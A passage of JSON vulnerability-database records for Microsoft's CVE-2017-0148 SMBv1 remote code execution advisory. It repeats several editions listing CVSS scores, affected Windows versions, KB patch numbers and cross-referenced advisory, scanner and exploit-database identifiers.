"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:08:23", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T16:48:04", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4013198", "KB3210721", "KB4012214", "KBMS16-110, 3187754", "KB4012598", "KB4012215", 
"KB3177186", "KB3210720", "KB3212646", "KB4012217", "KB4013429", "KB3205409", "KB4012216", "KB3213986", "KB4012212", "KB4012606", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:48:04", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T19:05:15", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012215", "KB4012212", "KB4012598", "KB3210721", "KB3212646", "KB4012606", "KB4013198", "KBMS16-110, 3187754", "KB3210720", "KB4013429", "KB3205401", "KB3205409", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
